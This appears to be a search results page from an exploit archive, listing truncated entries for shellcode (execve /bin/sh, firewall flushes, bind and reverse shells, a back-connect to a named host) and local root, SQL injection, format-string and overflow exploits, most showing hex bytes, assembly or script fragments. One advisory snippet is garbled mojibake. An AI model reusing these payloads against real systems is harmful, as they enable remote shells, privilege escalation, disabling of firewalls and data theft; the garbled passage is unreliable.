2058 matches found
linux/x86 ipchains -F 49 bytes
No description provided by source. include stdio.h include string.h / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cero pushl %edx y ponemos los zeros del final del string en memoria pushw $0x462d tenemos -F0000...
linux/x86 ipchains -F 49 bytes
linux/x86 ipchains -F 49 bytes. Shellcode exploit for linx86 platform include include / asm" sub $0x4,%esp Con esto conseguimos que la shellcode nunca se popl %esp sobreescriba... gracias RaiSe : xorl %edx,%edx %edx a cero pushl %edx y ponemos los zeros del final del string en memoria pushw $0x46...
os-x/PPC create /tmp/suid 122 bytes
Exploit for os-x/ppc platform in category shellcode =================================== os-x/PPC create /tmp/suid 122 bytes =================================== / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does open; write; close; exit; See ASM below. 122 Bytes. / char shellcode =...
freebsd/x86 execve /bin/sh 37 bytes
Exploit for freebsd/x86 platform in category shellcode =================================== freebsd/x86 execve /bin/sh 37 bytes =================================== / This is FreeBSD execve code.It is 37 bytes long.I'll try to make it smaller.Till then use this one. signed predator...
linux/x86 xterm -ut -display [IP]:0 132 bytes
Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 xterm -ut -display IP:0 132 bytes ============================================= / Linux/x86 execve of /usr/X11R6/bin/xterm -ut -display ip:0, exit 127.0.0.1 is an example, you must change ...
HPUX execve /bin/sh 58 bytes
No description provided by source. / Hp-Ux execve of /bin/sh by K2 / uchar shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40" "\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"...
linux/x86 - iptables -F 58 bytes
linux/x86 iptables -F 58 bytes. Shellcode exploit for linx86 platform / The shellcode flushs the iptables by running /sbin/iptables -F no exit greetz to zilion: man, my code is shorter! size = 58 bytes OS = Linux i386 written by /rootteam/dev0id www.sysworld.net BITS 32 jmp short callme main: pop...
solaris/x86 execve /bin/sh toupper evasion 84 bytes
solaris/x86 execve /bin/sh toupper evasion 84 bytes. Shellcode exploit for solarisx86 platform / Solaris/x86 Used for toupper evasion look to the linux version for an explanation and usage example. / char c0de = / main: / "\xeb\x33" / jmp callz / / start: / "\x5e" / popl %esi / "\x8d\x06" / leal...
windows/XP-sp1 portshell on port 58821 116 bytes
windows/XP-sp1 portshell on port 58821 116 bytes. Shellcode exploit for win32 platform / 116 bytes bindcode hardcoded for Windows XP SP1 / / but you can change the address if you want / / i made it pretty clear where they are / / the bindcode will bind to port 58821 / / by silicon /...
bsd/x86 reverse portbind 129 bytes
Exploit for bsd/x86 platform in category shellcode ================================== bsd/x86 reverse portbind 129 bytes ================================== / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on...
bsd/x86 connect 93 bytes
No description provided by source. / the back-connect shellcode. The destination addr is 0x28402ec3 rootteam.host.sk port is 0x8ae 2222. size = 93 bytes little isn't it? Greetz 2 sp00fed written by dev0id rus-sec /EFnet rootteam.host.sk BITS 32 jmp short path main: pop esi xor eax,eax mov byte...
GNU Sharutils <= 4.2.1 Local Format String PoC Exploit
No description provided by source. / GNU sharutils = 4.2.1 Local Format String POC Code C0ded by n4rk0tix a.k.a nrktx [email protected] Below is a l4m3 proof of concept code for da recently reported lame bug; These binaryz have not only format bugz, but also buffer overflowz,etc.We also...
CDRecord's ReadCD Local Root Privileges
Exploit for linux platform in category local exploits ======================================= CDRecord's ReadCD Local Root Privileges ======================================= !/bin/bash echo "readcd-exp.sh -- ReadCD local exploit Test on cdrecord-2.01-0.a27.2mdk" echo "Author : newbug at chroot.or...
PHP-Nuke SQL Injection Edit/Save Message(s) Bug
Exploit for unknown platform in category web applications =============================================== PHP-Nuke SQL Injection Edit/Save Messages Bug =============================================== !/usr/bin/perl use LWP; $log = "poskomenphpnukesavemsg.txt"; $Agent = "Mbahmubangga/1.0"; $proxy ...
htpasswd Apache 1.3.31 - Local Overflow
!/usr/bin/perl Proof Of Concept exploit for htpasswd of Apache. Read the advisory for more information. - Luiz Fernando Camargo - foxtrotatflowsecurity.org $shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"...
adv17.txt
+| Advisory 17. Search Engine & Directory by Turbo Seek Software: Search Engine & Directory Powered by Turbo Seek Vendor: FocalMedia.Net http://www.focalmedia.net Vulnerability: âîçìîæíîñòü ÷òåíèÿ ôàéëîâ Risk: ñðåäíèé Date: 10'Sept 2004 discovered by durito -duritoatmaildotru- HTTP: www.lwb57.org...
Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service
source: https://www.securityfocus.com/bid/11161/info Pingtel Xpressa handsets are reported prone to a remote denial of service vulnerability. The issue is reported to exist because of a lack of sufficient boundary checks performed on HTTP request data handled by the Xpressa administration web...
linux/x86 execve /bin/sh xor encrypted 55 bytes
linux/x86 execve /bin/sh xor encrypted 55 bytes. Shellcode exploit for linx86 platform / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl...
linux/x86 execve /bin/sh xor encrypted 55 bytes
No description provided by source. / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl %ebx,0x8%esp movl %edx,0xc%esp movb $0xb,%al leal 0x8%esp,%e...
linux/x86 bsd/x86 execve /bin/sh 38 bytes
Exploit for multiple platform in category shellcode ========================================= linux/x86 bsd/x86 execve /bin/sh 38 bytes ========================================= / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68"...